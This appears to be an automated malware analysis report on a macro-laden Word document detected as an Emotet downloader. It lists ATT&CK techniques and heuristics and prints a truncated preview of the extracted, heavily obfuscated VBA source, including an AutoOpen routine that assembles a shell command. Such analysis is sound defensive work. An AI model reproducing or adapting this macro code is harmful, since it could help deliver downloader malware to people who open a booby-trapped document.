MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1566.001 Spearphishing Attachment
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. This is further supported by the ClamAV detection identifying it as 'Doc.Downloader.Emotet-6884001-2'. The AutoOpen macro is present and configured to execute, strongly suggesting the VBA code is designed to download and execute a secondary payload.
Heuristics (7)

- ClamAV: Doc.Downloader.Emotet-6884001-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6884001-2
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 111152 bytes |

SHA-256: db85fcad310926271bb0c2e3e0c21726b03a083dafc2a2ee66ef6af09cad0b1f

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "uplwidTTizusH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim QVWNBt(2)
QVWNBt(0) = Left(GbzlziS + ATEZFzLVcnKcbhABii + aNUZAH, 759) + MidB(UFjmzXL + CfRhYcUKQiRGdNLlqwEiX + ZAqcJovH, 545, 150)
QVWNBt(1) = Right(pshjwXVM + WlVMZPYztYiDrihWzBFzkWt + HKCwcz, 575) + MidB(zOfii + VGoqBQbqNaQpjGGqmr + FNZaJ, 594, 816) + Right(vqPPES + uaFOWNSXiZboXBjccoHwz + VvUac, 775) + MidB(sQVrjAGD + RpiYZWOVoDndFRTrhGklq + XJAbW, 724, 106)
Dim twunij(2)
twunij(0) = MidB(ktRofQ + suHlnzRNGthPFuSzkjncZQt + TdiDKOoF, 772, 791) + Right(hhKYnMCf + AnSuGFSitjbtzbBQpdzz + zcDmE, 830) + Right(UdrkPIjm + wNFoLwoAOIVAoOcPwRC + YVkFHth, 69) + Right(ArzKRGp + aizcDVYAWJCwVpMrjHj + VnXuwKIH, 32)
twunij(1) = Mid(BZthkj + jPdEVbvuwiitdCwiEwOB + EUpwfHz, 285, 132) + MidB(rjBSAiO + dYYXlREodSNdUFfOrl + EUPfzMD, 278, 8)
Dim VFSqE(2)
VFSqE(0) = MidB(NBzUBC + REGolSkkjlIpFvaq + AYctm, 576, 849) + MidB(SJczTq + LBNViGTvNMuZbMrjdvwoP + Rbfnj, 980, 638)
VFSqE(1) = MidB(pKoSRI + QfZzrkoCKuzNNXprPn + NXMWhW, 982, 274) + Right(lXkrLafu + omEAcMkcRiZkSMcDSDwaAb + MLOMUo, 58)
Dim GfvSKN(1)
GfvSKN(0) = MidB(adGUOPkK + zShJlDVmoslUvNlMn + VrtIw, 997, 37) + MidB(BILBa + tbOobhBpoASBwwzwpPcVD + bqcCQt, 908, 315) + Right(ZjanqEu + jOODBiDihRGLULMLXG + GOhAXIz, 223) + Right(DkHMm + NPkiaiMUhfriMcHpTijV + iuIjzt, 477)
Dim SLuUmE(1)
SLuUmE(0) = MidB(PMnRf + ErjasLEZzYjOENklJSjjfzK + OCvjcSH, 560, 170) + Left(POmHUOU + BcGXtZdYAahoTDrGwwkb + WujYOR, 593) + Left(jmwYmD + VICzavbQWObCRKXizA + vtQkXnf, 85) + Left(NPTBN + EBwvQMWRuOPYrjbFKLEj + KToBhz, 925)
Dim KqmCjj(1)
KqmCjj(0) = MidB(CbTUzZJY + wHthuMskEcXGvcDZ + FwqdurB, 664, 404) + Right(Sobdt + NpnzQLimOEwGzFJDDAjLJP + FAicCz, 131) + Right(nGiiwHi + YsLMKkUZwjiikKtilCzznV + aZFsCXf, 823) + MidB(sqtIM + iFJVXZUwBbasTztQUDiH + znjwpdpX, 789, 177)
YcSnTRLM (KeyString(VzVwM + BuFnPZPI + 18 + 20 + 29 + UqjDr + wEVNRR) + XKzuBDU + jwZNHkk + KeyString(kkJCEiDw + lkkcX + 20 + 23 + 34 + PSOhwzru + ULrUluij) + WJJNWfv + aXhScVhQ + EDQIDw + joLVkP + FSXmYsGMaNu + RssYdXZ + jAVCYtkwsU + DofYGV + UiAWtP)
Dim HAwKb(2)
HAwKb(0) = MidB(sXGYlDDO + kqcoiYlddFfavOtJRWncrn + wSMQTYjJ, 480, 381) + Mid(bMPzwrM + KrmWFQwNlBocRMlG + pazEhFG, 808, 616) + MidB(DnmaZuO + MLiQzCnjkGGGRnRXEJ + lbZlCCr, 355, 448) + MidB(ZdriFf + JwsUzOImcqJJwpZQVko + NiAsZEL, 860, 441)
HAwKb(1) = MidB(ltHcXltF + iOSwutjMiViJGZihRzm + tDhwt, 689, 832) + Mid(CiUhtiK + KHbGjAOMKYYjIFrLjUcr + Hctjf, 78, 434) + MidB(cLimUh + XjKDSiaonzvJhEbYVdjGB + TiZSWi, 39, 707) + MidB(cwptT + QXpJvwuiIMGqaIQCzVQVtYbF + miBWo, 804, 585)
Dim Ymfjd(1)
Ymfjd(0) = Mid(dOkThmfc + ACwkTqcGiKkCkvpETlm + uNVsX, 991, 984) + MidB(SpcBVF + GWritMzpqpYnkNqFVoFHil + uCSakIV, 590, 306)
End Sub
Attribute VB_Name = "BBVDJJJBaic"
Function WJJNWfv()
Dim LPKJVM(1)
LPKJVM(0) = MidB(kzcSQ + jscXiIfDVUhYBKswAFJE + LnRSFJoR, 968, 403) + Mid(iEWfMC + fZziQaSVuanXVNkDMf + jvKfncV, 854, 141)
Dim Vncjw(2)
Vncjw(0) = Left(AUCFW + CNfAujKMHdShnqF + iznMuWv, 779) + MidB(TwnInQ + TPKmEJGFmThMAjCZTGYEr + nfXAiQoY, 724, 513) + Left(vdXnQIUb + RUikrjvKSkFiFIDs + GwiHwv, 351) + MidB(WbwUODRt + NqQBLHNFKARiOVDduk + OvIIBvfn, 277, 577)
Vncjw(1) = MidB(YpwTRp + zwEtiRhOQiWCGChG + Wlnwoi, 405, 491) + Mid(FCjpR + ajszZwOFVnqRjjbKRwtmiI + YUoNk, 301, 739) + MidB(Zcznoi + hjScWsOHZTjzuubtRHDa + MrLiWdN, 208, 560) + MidB(MaBjvz + SbZPmCsMRBdJnAKulwFVUIR + ZJVHbk, 231, 16)
Dim ZbiQYt(1)
ZbiQYt(0) = Right(PZZrpO + tNGEGVVYfvtCYbAWIGjhc + BHuiUHs, 690) + Right(uiUDFFdt + VqwZVWGkNfdMNdFKoB + cFnzECB, 56)
UEkUjrbvz = "d \\\/ \/\ \ \\" + "\ /V:O/C" + """" + "set {$\=a70" + "2 70a2 a720 27a" + "0 072a 02a7 027a 27" + "0a a270 02a7 07a" + "2 a702 a072 "
Dim mnnCn(1)
mnnCn(0) = Left(vEuWEz + RcwaUzSiFmnBSVMS + ahPdJUV, 733) + Mid(jFcDQ + mwmVEzBvvCbBshwujzLtijK + hNwlK, 598, 492) + MidB(MWkOhcZT + NzIIMVsbFHpuOTwQRWSN + UKUQi, 3
... (truncated)